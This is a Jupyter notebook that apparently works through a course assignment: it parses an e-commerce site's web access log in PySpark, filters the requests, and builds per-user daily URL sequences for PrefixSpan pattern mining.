151.242.106.253 - - [26/Jan/2019:20:29:12 +0330] "GET /image/30181?name=fsr14-55.jpg&wh=max HTTP/1.1" 200 50162 "https://www.zanbil.ir/m/product/30181/59833/%DB%8C%D8%AE%DA%86%D8%A7%D9%84-%D9%81%D8%B1%DB%8C%D8%B2%D8%B1-%D8%B3%D8%A7%DB%8C%D8%AF-%D8%A8%D8%A7%DB%8C-%D8%B3%D8%A7%DB%8C%D8%AF-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-FSR14-STS" "Mozilla/5.0 (Linux; Android 7.0; P008) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36" "-"
192.15.51.231 - - [26/Jan/2019:20:29:13 +0330] "GET /image/267/productModel/150x150 HTTP/1.1" 200 3423 "https://www.zanbil.ir/m/product/4125/205/%D8%B3%DB%8C%D9%86%DA%A9-%D8%B8%D8%B1%D9%81%D8%B4%D9%88%DB%8C%DB%8C-%D8%B1%D9%88%DA%A9%D8%A7%D8%B1

In [None]:
# Note this test doesn't involve spark
lines = open("/home/jovyan/mydir/small20.log").readlines()
for l in map(myParser, lines):
   print(l)

('91.99.55.165', datetime.datetime(2019, 1, 26, 20, 29, 12), '/m/filter/p2597%2Cb231?page=1', 200)
('151.242.106.253', datetime.datetime(2019, 1, 26, 20, 29, 12), '/image/30181?name=fsr14-55.jpg&wh=max', 200)
('192.15.51.231', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/267/productModel/150x150', 200)
('13.66.139.0', datetime.datetime(2019, 1, 26, 20, 29, 13), '/product/29746/%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D8%A7%D8%B5%D9%84%D8%A7%D8%AD-%D8%A8%D8%AF%D9%86-%D9%BE%D8%B1%D9%86%D8%B3%D9%84%DB%8C-%D9%85%D8%AF%D9%84-Princely-Body-Groomer-PR461AT', 200)
('45.79.177.249', datetime.datetime(2019, 1, 26, 20, 29, 13), '/m/browse/evaporative-air-cooler/%DA%A9%D9%88%D9%84%D8%B1-%D8%A2%D8%A8%DB%8C', 200)
('180.94.84.225', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/get?path=/Image/ofa4bc2n.jpg', 200)
('5.134.161.178', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/216/brand', 200)
('5.134.161.178', datetime.datetime(2019, 1, 26, 20, 29, 13), '/image/217/brand', 200)
('5.134.161.

After your test, apply your function `myParser` to the Spark RDD built from the full `access.log` file and print 15 rows (use `.take(15)`). Each row will be:

`IP, TIMESTAMP, REQUEST_URL, STATUS`


## <font color=red>Your code to test `myParser` by reading access.log as a Spark RDD and printing 15 rows here</font>

In [None]:
sc.stop()
sc = SparkContext('local[*]')


# Note data is an object of RDD: pyspark.rdd.PipelinedRDD
data = sc.textFile("access.log")

transactions = data.map(myParser)
# model = FPGrowth.train(transactions, minSupport=0.2, numPartitions=10)
# result = model.freqItemsets().collect() ## << note .collect()
# for fi in result:
#     print(fi)
for i in transactions.take(15):
    print(i)

('54.36.149.41', datetime.datetime(2019, 1, 22, 3, 56, 14), '/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53', 200)
('31.56.96.51', datetime.datetime(2019, 1, 22, 3, 56, 16), '/image/60844/productModel/200x200', 200)
('31.56.96.51', datetime.datetime(2019, 1, 22, 3, 56, 16), '/image/61474/productModel/200x200', 200)
('40.77.167.129', datetime.datetime(2019, 1, 22, 3, 56, 17), '/image/14925/productModel/100x100', 200)
('91.99.72.15', datetime.datetime(2019, 1, 22, 3, 56, 17), '/product/31893/62100/%D8%B3%D8%B4%D9%88%D8%A7%D8%B1-%D8%AE%D8%A7%D9%86%DA%AF%DB%8C-%D9%BE%D8%B1%D9%86%D8%B3%D9%84%DB%8C-%D9%85%D8%AF%D9%84-PR257AT', 200)
('40.77.167.129', datetime.datetime(2019, 1, 22, 3, 56, 17), '/image/23488/productModel/150x150', 200)
('40.77.167.129', datetime.datetime(2019, 1, 22, 3, 56, 18), '/image/45437/productModel/150x150', 200)
('40.77.167.129', datetime.datetime(2019

## Filtering the spark data

Now you want to filter your RDD. Step 0 is complete; the remaining steps are 1, 2, and 3.

0. read the access.log into spark (**completed**)
1. filter out all unnecessary lines as highlighted before.
2. Get a list of IPs (let's call it uniqueIPs) who performed the action of adding product(s) to the basket
3. filter out all records whose IP does not belong to the IP list in step 2.

#### Converting RDD to dataframe

To do the filtering operations, we want to convert the RDD into a Spark DataFrame. Run and study the following example.

**Note**: if you get the error `ValueError: Cannot run multiple SparkContexts at once`, you need to stop the previous `SparkContext` by running
```python
sc.stop()
```

Or comment out the line `sc = SparkContext('local[*]')`.

**Important**: run and **study** the code example below carefully; you might use every line of it, with modifications, in the project.

```python
from pyspark.sql import SparkSession
from pyspark import SparkContext
import pyspark.sql.functions as F


sc = SparkContext('local[*]') # comment this in case you already have SparkContext running



dataList = [("James", "Cameron","Sales","NY",90000,34,10000),
    ("Michael", "Johnson","Sales","NY",86000,56,20000),
    ("Robert", "Stromberg","Sales","CA",81000,30,23000),
    ("Maria", "McDonald","Finance","CA",90000,24,23000),
    ("Raman","Pearson","Finance","CA",99000,40,24000),
    ("Scott","Kindel","Finance","NY",83000,36,19000),
    ("Jen","Lewis","Finance","NY",79000,53,15000),
    ("Jeff", "Scott","Marketing","CA",80000,25,18000),
    ("Kumar", "Jobs","Marketing","NY",91000,50,21000)
  ]
rdd=sc.parallelize(dataList) # Note RDD is created from list, similar to creating it from a text file

# *** Now we convert rdd to dataframe
spark = SparkSession(sc) # this is necessary for rdd to be converted to data frame

# converting RDD to DataFrame
df = rdd.toDF(schema = ["first_name", "last_name","department","state","salary","age","bonus"])

# Show schema
df.printSchema()

# Show data frame
df.show(truncate=False)

# Note we create two new columns from grouped data:
# they are renamed as dep_salary, dep_individual_salary
df.groupBy("department").agg(F.sum('salary').alias("dep_salary"),
          F.collect_list('salary').alias("dep_individual_salary")).show()
```
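To see what `groupBy("department").agg(...)` computes, here is the same aggregation done by hand in plain Python on the (department, salary) pairs from `dataList`. This only illustrates the semantics of `F.sum` and `F.collect_list`; it is not how Spark executes the query.

```python
from collections import defaultdict

# (department, salary) pairs taken from dataList above
rows = [("Sales", 90000), ("Sales", 86000), ("Sales", 81000),
        ("Finance", 90000), ("Finance", 99000), ("Finance", 83000), ("Finance", 79000),
        ("Marketing", 80000), ("Marketing", 91000)]

dep_salary = defaultdict(int)              # plays the role of F.sum('salary')
dep_individual_salary = defaultdict(list)  # plays the role of F.collect_list('salary')
for department, salary in rows:
    dep_salary[department] += salary
    dep_individual_salary[department].append(salary)

for dep in dep_salary:
    print(dep, dep_salary[dep], dep_individual_salary[dep])
```

Spark does not guarantee the order of the grouped rows, or of the elements inside a `collect_list`, so its output may be ordered differently.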


## Actual steps for filtering the spark data

Now write your code to

1. Convert the Spark RDD to a DataFrame, then filter out all unnecessary lines as highlighted in <font color=orange>orange</font> in the section `Understand the Web Log Format` above.
2. Get a list of IPs (let's call it `uniqueIPs`) that performed the action of adding product(s) to the basket.
3. Filter out all records whose IP does not belong to the IP list from step 2.
4. Note that steps 2 and 3 should not be performed literally; the wording is only for ease of understanding. This is explained further in the next section (see the **Last note**).



## Important resources for wrangling spark data, should you encounter problems

- When testing your code, you will go through many trial-and-error cycles; you can speed this up by creating a relatively small data file (say, 10,000 to 30,000 lines) and testing your code on it until it succeeds.
- Please bookmark [this tutorial](https://sparkbyexamples.com/) and study relevant examples (browse the menu on the left) if you have trouble with certain functions.
- You may want to explore `where` or `filter`, `groupBy`, `agg`, `withColumn`, `Date and Timestamp Functions`, `udf` (user defined function)
- **Note**: the examples generally omit import statements. If you get errors saying certain objects are not defined, they may be resolved by
```python
from pyspark.sql.functions import *
from pyspark.sql.types import *
```
Or you search google with something like `pyspark import udf`
- One useful function for a DataFrame column is `.isin()`, which takes a list and checks the column's elements against it; see https://spark.apache.org/docs/latest/api/python/reference/api/pyspark.sql.Column.isin.html?highlight=isin
- One way to convert a Spark DataFrame column into a Python list is to call `toPandas()` and then use pandas functions; for example, to get the list of first names from the example `df` above:
```python
h = df.select("first_name").toPandas()
huge_list = list( h["first_name"].values)
huge_list
```

- **Last note**: Filtering a Spark DataFrame with a list can be extremely slow when you deal with a huge list and a big DataFrame. The standard approach in this scenario is to use two DataFrames and apply an [inner join](https://sparkbyexamples.com/pyspark/pyspark-join-explained-with-examples/). So please use an inner join or simply use SQL syntax. If you stick with `.isin(huge_list)`, you get a 2-point deduction.
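One detail to watch when you use an inner join for step 3: if the table of basket IPs lists an IP more than once (for example, a user who added several products), every matching log record is repeated once per duplicate. The plain-Python sketch below, on hypothetical data, mimics inner-join semantics to show the effect. In Spark you can avoid it by calling `.distinct()` on the IP DataFrame before joining, or by using a left-semi join (`how="left_semi"` in `DataFrame.join`), which keeps each left row at most once.

```python
# Hypothetical parsed log records: (IP, REQUEST_URL)
logs = [("1.1.1.1", "/m/product/100"),
        ("1.1.1.1", "/basket/add/100"),
        ("2.2.2.2", "/m/product/200")]
# Basket-add events by IP; 1.1.1.1 added two products, so it appears twice
basket_ips = ["1.1.1.1", "1.1.1.1"]

def inner_join(left, keys):
    """Inner join on IP: one output row per (left row, matching key) pair."""
    return [row for row in left for key in keys if row[0] == key]

with_dups = inner_join(logs, basket_ips)             # each 1.1.1.1 row appears twice
deduped = inner_join(logs, sorted(set(basket_ips)))  # distinct IPs first
print(len(with_dups), len(deduped))  # 4 2
```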

## <font color=red>Your code for filtering spark data here </font>

In [None]:
#TEST EXAMPLE
from pyspark.sql import SparkSession
from pyspark import SparkContext
import pyspark.sql.functions as F

# Stop the SparkContext left over from an earlier cell, if any (only one can be active at a time)
try:
    sc.stop()
except NameError:
    pass

sc = SparkContext('local[*]')
dataList = [("James", "Cameron","Sales","NY",90000,34,10000),
    ("Michael", "Johnson","Sales","NY",86000,56,20000),
    ("Robert", "Stromberg","Sales","CA",81000,30,23000),
    ("Maria", "McDonald","Finance","CA",90000,24,23000),
    ("Raman","Pearson","Finance","CA",99000,40,24000),
    ("Scott","Kindel","Finance","NY",83000,36,19000),
    ("Jen","Lewis","Finance","NY",79000,53,15000),
    ("Jeff", "Scott","Marketing","CA",80000,25,18000),
    ("Kumar", "Jobs","Marketing","NY",91000,50,21000)
  ]
rdd=sc.parallelize(dataList) # Note RDD is created from list, similar to creating it from a text file

# *** Now we convert rdd to dataframe
spark = SparkSession(sc) # this is necessary for rdd to be converted to data frame

# converting RDD to DataFrame
df = rdd.toDF(schema = ["first_name", "last_name","department","state","salary","age","bonus"])

# Show schema
df.printSchema()

# Show data frame
df.show(truncate=False)

# Note we create two new columns from grouped data:
# they are renamed as dep_salary, dep_individual_salary
df.groupBy("department").agg(F.sum('salary').alias("dep_salary"),
          F.collect_list('salary').alias("dep_individual_salary")).show()

root
 |-- first_name: string (nullable = true)
 |-- last_name: string (nullable = true)
 |-- department: string (nullable = true)
 |-- state: string (nullable = true)
 |-- salary: long (nullable = true)
 |-- age: long (nullable = true)
 |-- bonus: long (nullable = true)

+----------+---------+----------+-----+------+---+-----+
|first_name|last_name|department|state|salary|age|bonus|
+----------+---------+----------+-----+------+---+-----+
|James     |Cameron  |Sales     |NY   |90000 |34 |10000|
|Michael   |Johnson  |Sales     |NY   |86000 |56 |20000|
|Robert    |Stromberg|Sales     |CA   |81000 |30 |23000|
|Maria     |McDonald |Finance   |CA   |90000 |24 |23000|
|Raman     |Pearson  |Finance   |CA   |99000 |40 |24000|
|Scott     |Kindel   |Finance   |NY   |83000 |36 |19000|
|Jen       |Lewis    |Finance   |NY   |79000 |53 |15000|
|Jeff      |Scott    |Marketing |CA   |80000 |25 |18000|
|Kumar     |Jobs     |Marketing |NY   |91000 |50 |21000|
+----------+---------+----------+-----+-----

In [None]:
from pyspark.sql import SparkSession
from pyspark import SparkContext
import pyspark.sql.functions as F

# Stop the SparkContext left over from an earlier cell, if any (only one can be active at a time)
try:
    sc.stop()
except NameError:
    pass

sc = SparkContext('local[*]')

data = sc.textFile("access.log")
# data = sc.textFile("large1000000.log")
# data = sc.textFile("small20.log")

transactions = data.map(myParser)

# *** Now we convert rdd to dataframe
spark = SparkSession(sc) # this is necessary for rdd to be converted to data frame

# converting RDD to DataFrame
df = transactions.toDF(schema = ["ip", "timestamp","request_url","status_code",])

df.show()
print(df.count())

+-------------+-------------------+--------------------+-----------+
|           ip|          timestamp|         request_url|status_code|
+-------------+-------------------+--------------------+-----------+
| 54.36.149.41|2019-01-22 03:56:14|/filter/27|13%20%...|        200|
|  31.56.96.51|2019-01-22 03:56:16|/image/60844/prod...|        200|
|  31.56.96.51|2019-01-22 03:56:16|/image/61474/prod...|        200|
|40.77.167.129|2019-01-22 03:56:17|/image/14925/prod...|        200|
|  91.99.72.15|2019-01-22 03:56:17|/product/31893/62...|        200|
|40.77.167.129|2019-01-22 03:56:17|/image/23488/prod...|        200|
|40.77.167.129|2019-01-22 03:56:18|/image/45437/prod...|        200|
|40.77.167.129|2019-01-22 03:56:18|/image/576/articl...|        200|
|66.249.66.194|2019-01-22 03:56:18|/filter/b41,b665,...|        200|
|40.77.167.129|2019-01-22 03:56:18|/image/57710/prod...|        200|
|207.46.13.136|2019-01-22 03:56:18|      /product/10214|        200|
|40.77.167.129|2019-01-22 03:56:19

In [None]:
df.createOrReplaceTempView("df")
status_code_df = spark.sql("SELECT * FROM df WHERE status_code == 200 OR (status_code < 400 AND status_code >=300)")
status_code_df.show(truncate=False)
print(status_code_df.count())

+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|ip           |timestamp          |request_url                                                                                                                                                                   |status_code|
+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|54.36.149.41 |2019-01-22 03:56:14|/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53        |200        |
|31.56.96.51  |2019-01-22 03:56:16|/image/60844/productModel/200x200                                        

In [None]:
# Test same query using different method to ensure everything works as expected
df_right_status_code = df.filter( (df.status_code == 200) |  ((df.status_code >= 300) & (df.status_code < 400)))
df_right_status_code.show(truncate=False)
print(df_right_status_code.count())

+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|ip           |timestamp          |request_url                                                                                                                                                                   |status_code|
+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|54.36.149.41 |2019-01-22 03:56:14|/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53        |200        |
|31.56.96.51  |2019-01-22 03:56:16|/image/60844/productModel/200x200                                        

In [None]:
df_no_js = df_right_status_code.filter(~df_right_status_code.request_url.contains('js'))
df_no_css = df_no_js.filter(~df_no_js.request_url.contains('css'))
df_no_css.show(truncate=False)
print(df_no_css.count())

+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|ip           |timestamp          |request_url                                                                                                                                                                   |status_code|
+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|54.36.149.41 |2019-01-22 03:56:14|/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53        |200        |
|31.56.96.51  |2019-01-22 03:56:16|/image/60844/productModel/200x200                                        
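`contains('js')` drops every URL that has the substring `js` anywhere, not only JavaScript files. The plain-Python sketch below, using hypothetical URLs (whether such URLs occur in this log was not checked), compares that with a regular expression anchored on the file extension. The same pattern should also work in Spark via `Column.rlike`, which takes a Java regular expression, e.g. `df.filter(~df.request_url.rlike(r'\.(js|css)(\?|$)'))`.

```python
import re

# Hypothetical request URLs
urls = [
    "/static/bundle.js",
    "/static/site.css?v=3",
    "/settings/data.json",        # contains "js" but is not a .js file
    "/browse/home-appliances",
]

# A .js or .css file name, optionally followed by a query string
ASSET_RE = re.compile(r"\.(js|css)(\?|$)")


def is_asset(url):
    return ASSET_RE.search(url) is not None


substring_kept = [u for u in urls if "js" not in u and "css" not in u]
regex_kept = [u for u in urls if not is_asset(u)]

print(substring_kept)  # ['/browse/home-appliances']
print(regex_kept)      # ['/settings/data.json', '/browse/home-appliances']
```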

In [None]:
df_basket_add = df_no_css.filter(df_no_css.request_url.contains('/basket/add'))
df_basket_add.show(truncate=False)
print(df_basket_add.count())

+---------------+-------------------+-------------------------------------------+-----------+
|ip             |timestamp          |request_url                                |status_code|
+---------------+-------------------+-------------------------------------------+-----------+
|5.117.242.204  |2019-01-22 04:13:19|/basket/add/55839?mobile=1&addedValues=    |302        |
|204.18.175.72  |2019-01-22 04:33:20|/basket/add/5544?mobile=1&addedValues=     |302        |
|89.36.63.1     |2019-01-22 04:39:41|/basket/add/64714?mobile=1&addedValues=    |302        |
|5.125.13.45    |2019-01-22 05:18:30|/basket/add/64756?mobile=1&addedValues=    |302        |
|188.166.113.28 |2019-01-22 06:44:31|/basket/add/62139?mobile=1&addedValues=    |302        |
|5.211.134.24   |2019-01-22 06:52:07|/basket/add/63294?mobile=1&addedValues=    |302        |
|5.235.227.104  |2019-01-22 06:57:25|/basket/add/62363?mobile=1&addedValues=    |302        |
|5.119.221.47   |2019-01-22 06:58:35|/basket/add/65278?mobil

In [None]:
unique_ips =  df_basket_add.dropDuplicates(["ip"]).select("ip")
unique_ips.show(truncate=False)
print(unique_ips.count())

+---------------+
|ip             |
+---------------+
|5.117.242.204  |
|83.122.120.209 |
|89.196.66.66   |
|2.181.243.101  |
|178.252.144.130|
|5.125.13.45    |
|5.114.160.181  |
|2.191.96.86    |
|5.237.115.244  |
|188.166.113.28 |
|5.114.183.125  |
|5.211.134.24   |
|204.18.175.72  |
|185.30.7.254   |
|91.208.165.222 |
|178.252.166.116|
|5.119.221.47   |
|5.121.110.137  |
|204.18.119.253 |
|5.235.227.104  |
+---------------+
only showing top 20 rows

2304


In [None]:
unique_ips.createOrReplaceTempView("unique_ips")
df_no_css.createOrReplaceTempView("df_no_css")
df_filtered = spark.sql("SELECT * FROM df_no_css INNER JOIN unique_ips ON df_no_css.ip = unique_ips.ip")
df_filtered.show(truncate=False)
df_filtered.createOrReplaceTempView("df_filtered")
print(df_filtered.count())

+------------+-------------------+-------------------------------------------------------------------------------------+-----------+------------+
|ip          |timestamp          |request_url                                                                          |status_code|ip          |
+------------+-------------------+-------------------------------------------------------------------------------------+-----------+------------+
|81.90.144.56|2019-01-22 07:41:48|/browse/home-appliances/%D9%84%D9%88%D8%A7%D8%B2%D9%85-%D8%AE%D8%A7%D9%86%DA%AF%DB%8C|200        |81.90.144.56|
|81.90.144.56|2019-01-22 07:41:50|/image/%7B%7BbasketItem.id%7D%7D?type=productModel&wh=50x50                          |200        |81.90.144.56|
|81.90.144.56|2019-01-22 07:41:51|/image/55/productType/240x180                                                        |200        |81.90.144.56|
|81.90.144.56|2019-01-22 07:41:51|/image/8/productType/240x180                                                         |200 

## Prepare Sequential Data for prefixspan

After loading all the data into Spark and filtering out unnecessary records, we prepare the sequential data for PrefixSpan.

In this project we define a sequence of events as:

> A series of URLs requested by one particular user (a user is identified by the IP address), within one day.

For example, if on 26/Jan/2019 a user requested `/A`, then `/B`, and then `/C` and `/D` at the same timestamp, these form the following sequence (a list of lists):

```python
[ ["/A"], ["/B"], ["/C", "/D"] ]
```
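Spark's `PrefixSpan` reports, for each pattern, how many input sequences contain it. The hypothetical helper below (plain Python, not part of Spark) sketches what "contains" means for this list-of-lists format: each itemset of the pattern must be a subset of a distinct event of the sequence, in the same order, with gaps allowed.

```python
def contains_pattern(sequence, pattern):
    """Return True if `pattern` occurs in `sequence` as a sequential pattern.

    Both arguments are lists of itemsets (lists of URLs). Every itemset of the
    pattern must be a subset of a distinct event of the sequence, and the matched
    events must appear in the same order; gaps between them are allowed.
    """
    pos = 0
    for itemset in pattern:
        wanted = set(itemset)
        # Greedily use the earliest remaining event that covers this itemset
        while pos < len(sequence) and not wanted <= set(sequence[pos]):
            pos += 1
        if pos == len(sequence):
            return False
        pos += 1  # the next itemset must match a strictly later event
    return True


seq = [["/A"], ["/B"], ["/C", "/D"]]
print(contains_pattern(seq, [["/A"], ["/C"]]))  # True: gaps are allowed
print(contains_pattern(seq, [["/B"], ["/A"]]))  # False: order matters
print(contains_pattern(seq, [["/C", "/D"]]))    # True: both URLs in one event
print(contains_pattern(seq, [["/B", "/C"]]))    # False: /B and /C are separate events
```

A sequence contributes at most 1 to a pattern's `freq`, however many times the pattern occurs in it.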

Starting from your Spark data frame (with all irrelevant rows filtered out; let's still call it `df`), you want to:


1. Group the data frame by `(IP, TIMESTAMP)` so that actions from the same IP at the same timestamp are grouped together
  - each group now contains one or more URLs, which we define as one event of the sequence
  - apply an aggregation (`agg`) function to create a **list of URLs** for each group; call this new aggregated column `EVENTS` and the aggregated data frame `DF2` (refer to the resources listed above and to the example code in the `Converting RDD to dataframe` section)
2. From `DF2`, create a new column called `DATE` that converts `TIMESTAMP` into a date, so that timestamps from the same day have the same value in this column (refer to the resources listed above).
3. Since the `DATE` column truncates each timestamp to its date, grouping the data frame by `(IP, DATE)` gives, in each group, the list of `EVENTS` from one user on one day. This is exactly the sequence defined above. So after grouping, create another aggregated column `SEQUENCE` that consists of the list of `EVENTS` in the group (refer to the example code in the `Converting RDD to dataframe` section).
4. Finally you want to print out 30 rows from column `SEQUENCE` to verify you did it right.
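A plain-Python sketch of these steps on hypothetical rows is below. Note the explicit sort by timestamp: in Spark, `F.collect_list` does not guarantee element order after a shuffle (its documentation describes it as non-deterministic), so sequences built with two `groupBy(...).agg(F.collect_list(...))` calls may not be in time order. One possible workaround, not used in the cells below, is to collect `F.struct('timestamp', 'EVENTS')`, sort the resulting array with `F.sort_array`, and then select its `EVENTS` field.

```python
from collections import defaultdict
from datetime import datetime

# Hypothetical filtered log rows: (ip, timestamp, url), deliberately out of order
rows = [
    ("1.1.1.1", "2019-01-26 10:00:05", "/C"),
    ("1.1.1.1", "2019-01-26 10:00:01", "/A"),
    ("1.1.1.1", "2019-01-26 10:00:05", "/D"),
    ("1.1.1.1", "2019-01-26 10:00:03", "/B"),
    ("1.1.1.1", "2019-01-27 09:00:00", "/A"),
    ("2.2.2.2", "2019-01-26 11:00:00", "/X"),
]

# Step 1: group by (ip, timestamp); each group's URLs form one event (EVENTS)
events = defaultdict(list)
for ip, ts, url in rows:
    events[(ip, datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))].append(url)

# Steps 2-3: derive DATE from the timestamp and group events by (ip, DATE).
# Iterating over the sorted keys keeps every SEQUENCE in chronological order.
sequences = defaultdict(list)
for ip, ts in sorted(events):
    sequences[(ip, ts.date())].append(events[(ip, ts)])

# Step 4: print the sequences
for (ip, day), seq in sorted(sequences.items()):
    print(ip, day, seq)
# 1.1.1.1 2019-01-26 [['/A'], ['/B'], ['/C', '/D']]
# 1.1.1.1 2019-01-27 [['/A']]
# 2.2.2.2 2019-01-26 [['/X']]
```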

## <font color=red>Your code for `Prepare Sequential Data for prefixspan` here </font>

In [None]:
import gc
gc.collect()

6997

In [None]:
DF2 = df_filtered.groupBy("df_no_css.ip", "timestamp").agg(F.collect_list('request_url').alias('EVENTS'))
DF2.show(truncate=False)
DF2.count()

+--------------+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|ip            |timestamp          |EVENTS                                                                                                                                                                                                                                                                                                                                                

435644

In [None]:
# convert timestamp to DATE
# DF2.schema("timestamp").dataType
DF2 = DF2.withColumn("DATE", F.to_date('timestamp'))
DF2.show(truncate=True)
DF2.count()

+--------------+-------------------+--------------------+----------+
|            ip|          timestamp|              EVENTS|      DATE|
+--------------+-------------------+--------------------+----------+
|10.139.192.130|2019-01-26 13:03:54|   [/filter/b43,p63]|2019-01-26|
|10.139.192.130|2019-01-26 13:03:55|[/image/238/brand...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:56|[/image/39/produc...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:57|[/image/3437/prod...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:58|[/image/5947/prod...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:59|[/image/5384/prod...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:00|[/image/969/artic...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:01|[/static/images/n...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:02|[/static/images/z...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:03|[/static/images/f...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:04|[/image/777/mainS...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:5

435644

In [None]:
DF2 = DF2.groupBy("ip", "DATE").agg(F.collect_list('EVENTS').alias('SEQUENCE'))
DF2.show(truncate=True)
DF2.count()

+---------------+----------+--------------------+
|             ip|      DATE|            SEQUENCE|
+---------------+----------+--------------------+
| 10.139.192.130|2019-01-26|[[/filter/b43,p63...|
|  10.233.251.23|2019-01-24|[[/filter/b256,p4...|
|   10.87.76.147|2019-01-23|[[/browse/air-con...|
|   10.87.76.147|2019-01-24|[[/image/33968?na...|
| 102.165.34.250|2019-01-22|[[/image/33980?na...|
| 102.165.34.250|2019-01-23|[[/filter/b261], ...|
| 102.165.34.250|2019-01-24|[[/], [/settings/...|
| 102.165.34.250|2019-01-25|[[/browse/Screen-...|
|  109.109.42.42|2019-01-22|[[/m/browse/appli...|
| 109.162.131.74|2019-01-22|[[/browse/dishwas...|
| 109.162.131.74|2019-01-23|[[/product/16721/...|
|  113.203.54.71|2019-01-25|[[/amp-helper-fra...|
|128.199.117.156|2019-01-22|[[/image/47987/pr...|
|128.199.117.156|2019-01-24|[[/amp-helper-fra...|
|128.199.117.156|2019-01-25|[[/image/32172?na...|
| 128.65.171.197|2019-01-26|[[/filter/b36,p5]...|
| 138.68.132.207|2019-01-23|[[/product/34286/...|


3167

In [None]:
DF2.show(n=30, truncate=True)

+---------------+----------+--------------------+
|             ip|      DATE|            SEQUENCE|
+---------------+----------+--------------------+
| 10.139.192.130|2019-01-26|[[/filter/b43,p63...|
|  10.233.251.23|2019-01-24|[[/filter/b256,p4...|
|   10.87.76.147|2019-01-23|[[/browse/air-con...|
|   10.87.76.147|2019-01-24|[[/image/33968?na...|
| 102.165.34.250|2019-01-22|[[/image/33980?na...|
| 102.165.34.250|2019-01-23|[[/filter/b261], ...|
| 102.165.34.250|2019-01-24|[[/], [/settings/...|
| 102.165.34.250|2019-01-25|[[/browse/Screen-...|
|  109.109.42.42|2019-01-22|[[/m/browse/appli...|
| 109.162.131.74|2019-01-22|[[/browse/dishwas...|
| 109.162.131.74|2019-01-23|[[/product/16721/...|
|  113.203.54.71|2019-01-25|[[/amp-helper-fra...|
|128.199.117.156|2019-01-22|[[/image/47987/pr...|
|128.199.117.156|2019-01-24|[[/amp-helper-fra...|
|128.199.117.156|2019-01-25|[[/image/32172?na...|
| 128.65.171.197|2019-01-26|[[/filter/b36,p5]...|
| 138.68.132.207|2019-01-23|[[/product/34286/...|


## Show time

Now use Spark's PrefixSpan implementation to mine the sequence data. This is just a simple call:
https://spark.apache.org/docs/latest/api/python//reference/api/pyspark.ml.fpm.PrefixSpan.html

- Note that the default sequence column in the input data frame is `sequence`; you can change it to match your data frame:
```python
prefixSpan.setSequenceCol('SEQUENCE')
```
- Experiment with `minSupport` and `maxPatternLength` to get meaningful patterns. Start with a high `minSupport` (0.5 is a very high value, but you can start with it) and a low `maxPatternLength` (5 is a good start) to speed up your test runs.

- Write a summary of the patterns you observe in the output.
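`minSupport` is a fraction of the input sequences (rows of `DF2`), not of log lines. To my understanding, Spark's implementation turns it into a minimum count as `ceil(minSupport * number_of_sequences)`; the sketch below applies that rule, assuming it holds, to the 3167 sequences counted in this notebook.

```python
import math


def min_count(min_support, n_sequences):
    """Minimum freq for a pattern, assuming Spark's ceil(minSupport * count) rule."""
    return math.ceil(min_support * n_sequences)


n_sequences = 3167  # value of DF2.count() reported in this notebook

for s in (0.5, 0.4, 0.2):
    print(s, min_count(s, n_sequences))
# 0.5 1584
# 0.4 1267
# 0.2 634
```

With `minSupport=0.5`, every reported pattern should therefore have a `freq` of at least 1584, which is consistent with the lowest value shown for 0.5 in the outputs (1589).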

## <font color=red>Your code for doing prefixspan here </font>

In [None]:
from pyspark.ml.fpm import PrefixSpan

prefixSpan = PrefixSpan()
prefixSpan.setSequenceCol('SEQUENCE')
prefixSpan.setMinSupport(0.5)
prefixSpan.setMaxPatternLength(5)
prefixSpan.findFrequentSequentialPatterns(DF2).sort("SEQUENCE").show(truncate=False)

+--------------------------------------------------------------------------------------------------------------------+----+
|sequence                                                                                                            |freq|
+--------------------------------------------------------------------------------------------------------------------+----+
|[[/basket/checkout]]                                                                                                |1639|
|[[/basket/view]]                                                                                                    |1617|
